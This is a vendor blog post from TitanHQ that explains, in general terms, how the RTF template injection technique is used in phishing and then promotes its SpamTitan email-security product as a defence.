New Ransomware Technique: RTF Template Injection

Posted by Trevagh Stankard on Tue, Dec 28th, 2021

Will there never be an end to ransomware innovation?  One of the reasons ransomware continues to be such a formidable adversary is the ability of ransomware creators to continue releasing new strains and new attack methodologies.  Back in March of 2021, a new technique called RTF Template Injection was discovered. Since then, it has been adapted by several nation state actors. It is anticipated that its use will become more widespread in the coming months.

How the Attack Works

The attack takes advantage of a feature within Microsoft Word that allows you to create a document with a template.  When creating a document using a rich text format file (RTF), you can include an RTF template that specifies how the document should be formatted.  These template files can be stored either locally on the user’s machine or retrieved from a URL or remote machine.   Attack actors have learned to take advantage of this by hosting template files with malicious macros on their own servers.  Each time the document is being accessed or written too it fetches the template automatically, allowing the infected template files to openly traverse the network.  These templates have a better chance of moving undetected by security filters and controls because they are recognized RTF files.  Many phishing campaigns have been identified using these files.

The reason why RTF files are being used in this case is because RTF files include their document formatting properties as plaintext strings within the bytes of the file.  This allows attack actors to access the formatting properties of an RTF document and modify the location of the supporting template file so that the template is retrieved from a designated URL. 

How to Combat these Attacks

These RTF injection attacks are normally implemented through phishing attacks.  For that reason, it is essential to have a modern-day advanced email security solution that knows how to prevent these files from accessing user inboxes in the first place.  SpamTitan by TitanHQ is ideally suited to thwart these types of attacks.  Besides its integrated double antivirus protection, SpamTitan has a built-in next generation sandbox security solution to protect against attacks that utilize file types that may normally be identified as benign.  A sandbox works by isolating a suspicious file and executing or denotating the file or URL prior to it reaching your network.  If the initiated action results in a malicious outcome, the file is deleted.  Should the file pass the test, it is reattached to the email and forwarded to the recipient.  If that weren’t enough, SpamTitan also utilizes auto learning and heuristics to identify anomalies in the structure and behavior of a file. 

Fight Innovation with Innovation

Cybercriminals are relentless in their pursuit to find new ways to exploit systems and users.  That’s why you need a security vendor that is relentless in creating new innovative solutions to combat their efforts.  At TitanHQ, we are constantly enhancing SpamTitan and WebTitan to ensure that our customers are

protected.  We encourage you to find out more about our innovative solutions by contacting us today.